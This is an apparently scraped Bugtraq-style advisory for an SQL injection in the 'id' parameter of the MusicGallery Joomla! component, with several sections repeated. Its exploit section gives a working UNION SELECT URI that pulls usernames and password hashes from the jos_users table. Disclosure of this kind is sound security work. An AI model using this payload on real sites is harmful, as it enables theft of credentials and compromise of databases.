MusicGallery Joomla! Component 'id' Parameter SQL Injection Vulnerability
BID:37146
Info
MusicGallery Joomla! Component 'id' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 37146 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 30 2009 12:00AM |
| Updated: | Nov 30 2009 08:25PM |
| Credit: | Don Tukulesto |
| Vulnerable: |
Itamar Elharar MusicGallery 0 |
| Not Vulnerable: | |
Discussion
MusicGallery Joomla! Component 'id' Parameter SQL Injection Vulnerability
The MusicGallery component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The MusicGallery component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
MusicGallery Joomla! Component 'id' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?option=com_musicgallery&task=itempage&id=-23+union+select+1,1,concat%28username,0x3a,password%29,1,database%28%29,666,1,version%28%29,0x446f6e2054756b756c6573746f,1,2009,0x496e646f6e657369616e20436f646572,1,1,1+from+jos_users--&Itemid=54
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?option=com_musicgallery&task=itempage&id=-23+union+select+1,1,concat%28username,0x3a,password%29,1,database%28%29,666,1,version%28%29,0x446f6e2054756b756c6573746f,1,2009,0x496e646f6e657369616e20436f646572,1,1,1+from+jos_users--&Itemid=54
Solution / Fix
MusicGallery Joomla! Component 'id' Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
MusicGallery Joomla! Component 'id' Parameter SQL Injection Vulnerability
References:
References:
- MusicGallery Homepage (Itamar Elharar)